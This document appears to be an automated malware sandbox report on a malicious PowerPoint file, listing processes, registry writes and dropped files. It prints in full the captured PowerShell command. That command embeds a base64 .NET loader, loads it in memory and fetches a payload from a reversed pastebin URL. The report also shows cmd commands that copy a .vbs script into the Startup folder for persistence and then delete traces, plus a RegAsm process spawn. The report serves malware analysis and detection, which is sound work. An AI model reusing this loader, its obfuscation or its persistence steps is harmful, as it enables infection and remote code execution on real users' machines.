User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
2284 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$Fwieq = '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AENvbnRleHRWYWx1ZWAxAFRocmVhZFNhZmVPYmplY3RQcm92aWRlcmAxAENsYXNzMQBDbGFzc0xpYnJhcnkzAGdldF9VVEY4ADxNb2R1bGU+AFQAREZXb1kARGlzcG9zZV9fSW5zdGFuY2VfXwBDcmVhdGVfX0luc3RhbmNlX18AUHJvamVjdERhdGEAbXNjb3JsaWIATWljcm9zb2Z0LlZpc3VhbEJhc2ljAExvYWQAU3luY2hyb25pemVkAEdldE1ldGhvZABSZXBsYWNlAENyZWF0ZUluc3RhbmNlAGdldF9HZXRJbnN0YW5jZQBkZWZhdWx0SW5zdGFuY2UAaW5zdGFuY2UAR2V0SGFzaENvZGUASW52b2tlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAEFwcFdpblN0eWxlAFNlY3VyaXR5UHJvdG9jb2xUeXBlAEdldFR5cGUAZ2V0X0N1bHR1cmUAc2V0X0N1bHR1cmUAcmVzb3VyY2VDdWx0dXJlAE1ldGhvZEJhc2UAQXBwbGljYXRpb25CYXNlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAFN0clJldmVyc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBIZWxwS2V5d29yZEF0dHJpYnV0ZQBHZW5lcmF0ZWRDb2RlQXR0cmlidXRlAERlYnVnZ2VyTm9uVXNlckNvZGVBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBEZWJ1Z2dlckhpZGRlbkF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAE15R3JvdXBDb2xsZWN0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAGdldF9WYWx1ZQBzZXRfVmFsdWUAR2V0T2JqZWN0VmFsdWUASnNLdmUAc2V0X0VuY29kaW5nAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcARnJvbUJhc2U2NFN0cmluZwBEb3dubG9hZFN0cmluZwBUb1N0cmluZwBHZXRGb2xkZXJQYXRoAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABDbGFzc0xpYnJhcnkzLmRsbABTaGVsbABzZXRfU2VjdXJpdHlQcm90b2NvbABTeXN0ZW0AcmVzb3VyY2VNYW4AVG9Cb29sZWFuAFN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24AQXBwRG9tYWluAGdldF9DdXJyZW50RG9tYWluAGdldF9BcHBsaWNhdGlvbgBNeUFwcGxpY2F0aW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAEludGVyYWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBSdW4ATWV0aG9kSW5mbwBDdWx0dXJlSW5mbwBLdGlwbwBUQURjcgBtX0FwcE9iamVjdFByb3ZpZGVyAG1fVXNlck9iamVjdFByb3ZpZGVyAG1fQ29tcHV0ZXJPYmplY3RQcm92aWRlcgBtX015V2ViU2VydmljZXNPYmplY3RQcm92aWRlcgBTcGVjaWFsRm9sZGVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXIATXlDb21wdXRlcgBDbGVhclByb2plY3RFcnJvcgBTZXRQcm9qZWN0RXJyb3IAQWN0aXZhdG9yAC5jdG9yAC5jY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLk15LlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLlJlc291cmNlcy5yZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAU3RyaW5ncwBnZXRfU2V0dGluZ3MATXlTZXR0aW5ncwBSZWZlcmVuY2VFcXVhbHMAQ29udmVyc2lvbnMAUnVudGltZUhlbHBlcnMAQ29uY2F0AE9iamVjdABNeVByb2plY3QAU3lzdGVtLk5ldABnZXRfRGVmYXVsdABXZWJDbGllbnQARW52aXJvbm1lbnQAQ29udmVydABTeXN0ZW0uVGV4dABtX0NvbnRleHQAaVFNQnUAQ2xhc3NMaWJyYXJ5My5NeQBnZXRfQXNzZW1ibHkATXlTZXR0aW5nc1Byb3BlcnR5AAAAL0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBSAGUAcwBvAHUAcgBjAGUAcwAAT2MAbQBkAC4AZQB4AGUAIAAvAGMAIABwAGkAbgBnACAAMQAyADcALgAwAC4AMAAuADEAIAAtAG4AIAA1ACAAJgAgAGMAbwBwAHkAIAAiAAEHIgAgACIAAANcAAALLgB2AGIAcwAiAABNYwBtAGQALgBlAHgAZQAgAC8AYwAgAHAAaQBuAGcAIAAxADIANwAuADAALgAwAC4AMQAgAC0AbgAgADcAIAAmACAAZABlAGwAIAAiAAEDIgAAQ1AAQQBiADUAZgB0ADcAMgAvAHcAYQByAC8AbQBvAGMALgBuAGkAYgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoAAAFAyYDJgEDQQAARUMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsAABdcAHYANAAuADAALgAzADAAMwAxADkAAClDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4AQwBsAGEAcwBzADEAAAdSAHUAbgAAF1wAUgBlAGcAQQBzAG0ALgBlAHgAZQAAAAAAzI9aL6rCbEyiG4fNrFFp4AAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBSACAQ4OBSABARFBByAEAQ4ODg4GFRIoARIMBhUSKAESCAYVEigBEmEGFRIoARIkBCAAEwAFAAICHBwHAAESaRGAjQUgABKAkQcgAgEOEoCRCAABEoCVEoCVCgcGDg4ODg4SgIkEAAECDgYAAQ4RgKUFAAEOHQ4JAAQIDhGArQIIBgADDg4ODgYAAQERgLUFAAASgL0GIAEBEoC9BAABDg4EIAEODgUgAg4ODgUAAg4ODgUAABKAxQUAAR0FDgcgARKAkR0FBSABEmkOBiABEoDNDgYgAhwcHRwGAAEBEoCJAwAAAQQAARwcBCABAhwDIAAIAyAADgQHAR4AAh4ABRABAB4ABAoBHgAEBwETAAYVEigBEwAHBhUSbQETAAYVEm0BEwACEwAECgETAAUgAQETAAi3elxWGTTgiQiwP19/EdUKOgcGFRIoARIMBwYVEigBEggHBhUSKAESYQcGFRIoARIkAwYSfQQGEoCBAwYSGAQAABIMBAAAEggEAAASYQQAABIkBAAAEn0FAAASgIEGAAEBEoCBBAAAEhgIAAUBDg4ODg4EIAASaQcQAQEeAB4ABzABAQEQHgAECAASDAQIABIIBAgAEmEECAASJAQIABJ9BQgAEoCBBAgAEhgEKAATAAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAFAQAAAAApAQAkRTMxRjJDRDYtMEIzQi00M0RELUI2NzAtNzEwOUYwQzcwMzNDAAAMAQAHMS4wLjAuMAAASQEAGi5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC41AQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZRIuTkVUIEZyYW1ld29yayA0LjUEAQAAAAgBAAEAAAAAABgBAApNeVRlbXBsYXRlCDExLjAuMC4wAABBAQAzU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyCDE2LjAuMC4wAABZAQBLTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5FZGl0b3JzLlNldHRpbmdzRGVzaWduZXIuU2V0dGluZ3NTaW5nbGVGaWxlR2VuZXJhdG9yCDE2LjIuMC4wAABhAQA0U3lzdGVtLldlYi5TZXJ2aWNlcy5Qcm90b2NvbHMuU29hcEh0dHBDbGllbnRQcm90b2NvbBJDcmVhdGVfX0luc3RhbmNlX18TRGlzcG9zZV9fSW5zdGFuY2VfXwAAABABAAtNeS5Db21wdXRlcgAAEwEADk15LkFwcGxpY2F0aW9uAAAMAQAHTXkuVXNlcgAAEwEADk15LldlYlNlcnZpY2VzAAAQAQALTXkuU2V0dGluZ3MAAAAAtAAAAM7K774BAAAAkQAAAGxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlUmVhZGVyLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkjU3lzdGVtLlJlc291cmNlcy5SdW50aW1lUmVzb3VyY2VTZXQCAAAAAAAAAAAAAABQQURQQURQtAAAAAAAAABEiyueAAAAAAIAAAB5AAAAPDwAADweAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAUlNEU0y66M9q/RZPhVvqU+tFgs0BAAAAQzpcVXNlcnNccGpvYW9cRGVza3RvcFxVcENyeVxNZXRvZG8gREZcQ2xhc3NMaWJyYXJ5M1xDbGFzc0xpYnJhcnkzXG9ialxSZWxlYXNlXENsYXNzTGlicmFyeTMucGRiAN08AAAAAAAAAAAAAPc8AAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADpPAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAA7AIAAAAAAAAAAAAA7AI0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBEwCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAACgCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMAbwBtAG0AZQBuAHQAcwAAAAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAAAAAAAqAAEAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAAAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMQAuADAALgAwAC4AMAAAAEQAEgABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMwAuAGQAbABsAAAAJgABAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAAAAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAATAASAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBkAGwAbAAAACIAAQABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAwAAAAMPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=';$BEisA = 'C:\Users\admin\AppData\Local\Temp\bFvBy.vbs';[Byte[]] $xDJoA = [System.Convert]::FromBase64String( $Fwieq );[System.AppDomain]::CurrentDomain.Load( $xDJoA ).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('TXMF9tBT/war/moc.nibetsap//:sptth', 'True', 'FKZVX', 'True', $BEisA ))" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
3244 | cmd.exe /c ping 127.0.0.1 -n 5 & copy "C:\Users\admin\AppData\Local\Temp\bFvBy.vbs" "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FKZVX.vbs" | C:\Windows\system32\cmd.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3236 | cmd.exe /c ping 127.0.0.1 -n 7 & del "C:\Users\admin\AppData\Local\Temp\bFvBy.vbs" | C:\Windows\system32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3372 | ping 127.0.0.1 -n 5 | C:\Windows\system32\PING.EXE | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3384 | ping 127.0.0.1 -n 7 | C:\Windows\system32\PING.EXE | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2088 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft .NET Assembly Registration Utility Version: 4.0.30319.34209 built by: FX452RTMGDR Modules
|
(PID) Process: | (1912) POWERPNT.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems |
Operation: | write | Name: | 6o2 |
Value: 366F320078070000010000000000000000000000 | |||
(PID) Process: | (1912) POWERPNT.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (1912) POWERPNT.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1041 |
Value: Off | |||
(PID) Process: | (1912) POWERPNT.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1046 |
Value: Off | |||
(PID) Process: | (1912) POWERPNT.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1036 |
Value: Off | |||
(PID) Process: | (1912) POWERPNT.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1031 |
Value: Off | |||
(PID) Process: | (1912) POWERPNT.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1040 |
Value: Off | |||
(PID) Process: | (1912) POWERPNT.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1049 |
Value: Off | |||
(PID) Process: | (1912) POWERPNT.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 3082 |
Value: Off | |||
(PID) Process: | (1912) POWERPNT.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1042 |
Value: Off |
PID | Process | Filename | Type | |
---|---|---|---|---|
1912 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\CVR97A3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1912 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\VmFAVTLu[1].txt | text | |
MD5:7B5425660E0B60B0D017FE06A0205B58 | SHA256:29C32CDEB327826650A503ABD949964763B93ECF4054B40208BCE2BC32AE7359 | |||
